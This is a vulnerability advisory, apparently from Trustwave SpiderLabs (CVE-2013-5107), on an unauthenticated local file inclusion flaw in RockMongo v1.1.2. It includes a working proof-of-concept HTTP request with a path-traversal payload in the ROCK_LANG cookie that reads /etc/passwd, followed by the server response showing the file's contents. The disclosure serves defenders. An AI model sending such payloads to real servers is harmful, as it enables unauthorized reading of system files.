Damian Profancik of Trustwave SpiderLabs reports:

RockMongo is vulnerable to a Local File Include and Path Traversal
Vulnerability. Specifically, modifying the the ROCK_LANG cookie.

This vulnerability does not require an attacker to be authenticated prior
to performing the exploit. This is because the ROCK_LANG cookie is
processed and included prior to logging in to the application. Below is a
proof of concept for exploiting this vulnerability:

Example 1 (Tested on RockMongo v1.1.2):

#Request

GET /index.php?action=login.index&host=0 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ROCK_LANG=../../../../etc/passwd%00
Connection: keep-alive


#Response

HTTP/1.1 200 OK
Date: Mon, 10 Jun 2013 13:32:57 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.9
Set-Cookie: PHPSESSID=mla2qlmqa810h07qn6bie8qk77; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4897
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>RockMongo</title>
<script language="javascript" src="js/jquery-1.4.2.min.js"></script>
<script language="javascript" src="js/jquery.textarea.js"></script>
<link rel="stylesheet" href="themes/default/css/global.css" type="text/css" media="all"/>
<script language="javascript">
$(function () {
$(document).click(window.parent.hideMenus);
if ($("textarea").length > 0) {
$("textarea").tabby();
}
});
</script>
</head>
<body>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:105:65534::/var/lib/nfs:/bin/false
postfix:x:106:114::/var/spool/postfix:/bin/false
ntop:x:107:116::/var/lib/ntop:/bin/false
mongodb:x:108:65534::/home/mongodb:/bin/false
mysql:x:109:118:MySQL Server,,,:/nonexistent:/bin/false
ntp:x:110:119::/home/ntp:/bin/false
+::::::
<script type="text/javascript">
var showMore = 0;
...

External references:
https://www.trustwave.com/spiderlabs/advisories/TWSL2013-026.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5107